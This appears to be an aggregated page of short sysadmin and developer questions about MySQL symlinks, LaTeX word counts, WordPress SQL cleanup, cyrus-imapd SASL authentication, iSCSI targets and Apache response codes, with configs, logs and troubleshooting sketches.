    I'm having an issue; I searched a lot, but I'm not sure if it's related to a previous security patch. On the latest version of MySQL on Debian Lenny (5.0.51a-24) I need to share one table between two databases. The two dbs are in the same path (/var/lib/mysql/db1 and db2). I created symbolic links for db2 pointing to the table in db1. When I query the same table from db2 I get this:

        ERROR 1030 (HY000): Got error 140 from storage engine

    This is how it looks:

        test-lan:/var/lib/mysql/test3# ls -alh
        drwx------ 2 mysql mysql 4.0K 2010-08-30 13:28 .
        drwxr-xr-x 6 mysql mysql 4.0K 2010-08-30 13:29 ..
        lrwxrwxrwx 1 mysql mysql   28 2010-08-30 13:28 blbl.frm -> /var/lib/mysql/test/blbl.frm
        lrwxrwxrwx 1 mysql mysql   28 2010-08-30 13:28 blbl.MYD -> /var/lib/mysql/test/blbl.MYD
        lrwxrwxrwx 1 mysql mysql   28 2010-08-30 13:28 blbl.MYI -> /var/lib/mysql/test/blbl.MYI
        -rw-rw---- 1 mysql mysql   65 2010-08-30 13:24 db.opt

    I really need those symlinks. Is there a way to make them work like before? (The old MySQL server is fine.) Thanks,
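
    A sketch of the first thing to check (that a Lenny security update tightened symlink handling is an assumption, but the timing fits the "previous security patch" suspicion):

        -- YES means symlink support is compiled in and enabled; DISABLED points at
        -- skip-symbolic-links (or the equivalent) in the server configuration
        SHOW VARIABLES LIKE 'have_symlink';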

    Read the article

  • Word count for LaTeX within emacs

    - by Seamus
    I want to count how many words my LaTeX document has in it. I can do this by going to the website for the texcount package and using the web interface there, but that's not ideal. I'd rather have some shortcut within emacs to just return the number of words in a file (or, ideally, the number of words in the file and in all files pulled in by \input or \include within the document). I have downloaded the texcount script, but I don't know what to do with it. That is, I don't know where to put the .pl file, or how to call it within emacs.
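
    A sketch of the command-line side (texcount is a self-contained Perl script, so it can live anywhere, e.g. ~/bin; -inc follows \input and \include files and -total prints only the sum):

        perl ~/bin/texcount.pl -inc -total mydocument.tex

    From emacs, a shortcut could simply shell out to that command on the current buffer's file, for instance via M-x compile.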

    Read the article

  • MySQL, replacing &nbsp; with... nothing (delete those, please!)

    - by javipas
    I'm trying to purge my WordPress content of "false" carriage returns (CR). These were caused by a migration of my content, which now presents, from time to time, a &nbsp; entity that makes the web rendering engine "paint" a CR where I would like there to be nothing. The paragraphs seem to have a double CR because of this and look too far apart. I'd like to be able to run a MySQL query to get rid of those strings, but so far I haven't found the key. What I've tried is:

        UPDATE wp_posts SET post_content = REPLACE(post_content, '&nbsp;', ' ');

    But I get <p> </p> where the &nbsp; strings were before, which is not the answer at all. Could it have to do with the ampersand? In that case, should I use something like &amp;nbsp; or something similar?
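
    A sketch of a two-pass cleanup (the first pass assumes the entity always sits in an otherwise empty paragraph; replacing with '' rather than ' ' avoids leaving the blank paragraph behind):

        UPDATE wp_posts SET post_content = REPLACE(post_content, '<p>&nbsp;</p>', '');
        UPDATE wp_posts SET post_content = REPLACE(post_content, '&nbsp;', '');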

    Read the article

  • cyrus-imapd does not work with sasldb2, but postfix works

    - by Felix Chang
    CentOS 6, 64-bit. When I use POP3 to access cyrus-imapd:

        S: +OK li557-53 Cyrus POP3 v2.3.16-Fedora-RPM-2.3.16-6.el6_2.5 server ready <3176565056.1354071404@li557-53>
        C: USER [email protected]
        S: +OK Name is a valid mailbox
        C: PASS abcabc
        S: -ERR [AUTH] Invalid login
        C: QUIT

    It fails with USER "abc" too. My imapd.conf:

        configdirectory: /var/lib/imap
        partition-default: /var/spool/imap
        admins: cyrus
        sievedir: /var/lib/imap/sieve
        sendmail: /usr/sbin/sendmail
        hashimapspool: true
        sasl_pwcheck_method: auxprop
        sasl_mech_list: PLAIN LOGIN
        tls_cert_file: /etc/pki/cyrus-imapd/cyrus-imapd.pem
        tls_key_file: /etc/pki/cyrus-imapd/cyrus-imapd.pem
        tls_ca_file: /etc/pki/tls/certs/ca-bundle.crt
        allowplaintext: true
        #defaultdomain: myabc.com
        loginrealms: myabc.com

    sasldblistusers2 shows:

        [email protected]: userPassword

    But my postfix works fine with the same user. /etc/sasl2/smtpd.conf:

        pwcheck_method: auxprop
        mech_list: plain login
        log_level: 7
        saslauthd_path: /var/run/saslauthd/mux

    /etc/postfix/main.cf:

        queue_directory = /var/spool/postfix
        command_directory = /usr/sbin
        daemon_directory = /usr/libexec/postfix
        data_directory = /var/lib/postfix
        mail_owner = postfix
        myhostname = localhost
        mydomain = myabc.com
        myorigin = $mydomain
        inet_interfaces = all
        inet_protocols = all
        mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
        local_recipient_maps =
        unknown_local_recipient_reject_code = 550
        mynetworks_style = subnet
        mynetworks = 192.168.0.0/24, 127.0.0.0/8
        relay_domains = $mydestination
        alias_maps = hash:/etc/aliases
        alias_database = hash:/etc/aliases
        home_mailbox = Maildir/
        mailbox_transport = lmtp:unix:/var/lib/imap/socket/lmtp
        debug_peer_level = 2
        debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5
        sendmail_path = /usr/sbin/sendmail.postfix
        newaliases_path = /usr/bin/newaliases.postfix
        mailq_path = /usr/bin/mailq.postfix
        setgid_group = postdrop
        html_directory = no
        manpage_directory = /usr/share/man
        sample_directory = /usr/share/doc/postfix-2.6.6/samples
        readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES
        smtpd_sasl_auth_enable = yes
        smtpd_sasl_local_domain = $myhostname
        smtpd_sasl_security_options = noanonymous
        smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
        smtpd_sasl_security_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
        message_size_limit = 15728640
        broken_sasl_auth_clients = yes

    Please help.
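
    A sketch of two things worth checking (both are assumptions about the cause, since postfix and cyrus read /etc/sasldb2 as different users and may expect different realms):

        # can the cyrus user read the sasldb at all?
        ls -l /etc/sasldb2
        setfacl -m u:cyrus:r /etc/sasldb2
        # the entry is stored under realm myabc.com; try adding one under the
        # hostname realm as well, since defaultdomain is commented out
        saslpasswd2 -c -u li557-53 abc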

    Read the article

  • ISCSI Target Ubuntu

    - by erai
    I'm trying to set up iscsitarget on Ubuntu 12.04, but I can't connect to it. On the Windows machine it says "Target Error", with no other output. My ietd.conf is:

        Target iqn.2012-06.com.org:virtual_machines.lun
            Lun 0 Type=fileio,Path=/media/volume0/storlun0.bin

    When I run iscsiadm -m discovery -t st -p localhost, the output is:

        iscsiadm: Connection to Discovery Address 127.0.0.1 failed
        iscsiadm: Login I/O error, failed to receive a PDU
        iscsiadm: retrying discovery login to 127.0.0.1
        iscsiadm: Connection to Discovery Address 127.0.0.1 closed
        iscsiadm: Login I/O error, failed to receive a PDU
        iscsiadm: retrying discovery login to 127.0.0.1
        iscsiadm: Connection to Discovery Address 127.0.0.1 failed
        iscsiadm: Login I/O error, failed to receive a PDU
        iscsiadm: retrying discovery login to 127.0.0.1
        iscsiadm: Connection to Discovery Address 127.0.0.1 failed
        iscsiadm: Login I/O error, failed to receive a PDU
        iscsiadm: retrying discovery login to 127.0.0.1
        iscsiadm: Connection to Discovery Address 127.0.0.1 failed
        iscsiadm: Login I/O error, failed to receive a PDU
        iscsiadm: retrying discovery login to 127.0.0.1
        iscsiadm: connection login retries (reopen_max) 5 exceeded
        iscsiadm: Could not perform SendTargets discovery.

    dmesg output:

        [ 3324.804665] iscsi_trgt: Removing all connections, sessions and targets
        [ 3325.875343] iSCSI Enterprise Target Software - version 1.4.20.3
        [ 3325.875415] iscsi_trgt: Registered io type fileio
        [ 3325.875420] iscsi_trgt: Registered io type blockio
        [ 3325.875425] iscsi_trgt: Registered io type nullio
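
    A sketch of the basic target-side checks (dmesg shows the kernel module registering its io types but no target being created, which often means the daemon is disabled or never reread the config):

        grep ISCSITARGET_ENABLE /etc/default/iscsitarget   # should be "true"
        sudo service iscsitarget restart
        netstat -tln | grep 3260                           # the target should listen here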

    Read the article

  • Prevent apache http server changing response code

    - by Brad
    Hi all, I have a servlet providing a REST-based service running on Tomcat, which I am accessing through Apache HTTP Server v2.2. My problem is that the response code for one of the service methods is being changed when it passes through the HTTP server. I have a curl script which I use to test the service. It is supposed to return a 204 No Content response, which it does when I hit the servlet directly. When I hit Apache with the script, the response gets changed to a 200 OK. Can anyone with experience configuring Apache advise me how to fix this? Thanks, Brad.
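
    One theory worth testing (a sketch; the path and the mod_deflate involvement are assumptions): a 204 can get rewritten to a 200 when an output filter adds a body or Content-Length on the way through. Exempting the service path from compression would confirm or rule that out:

        <Location /rest>
            SetEnv no-gzip 1
        </Location>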

    Read the article
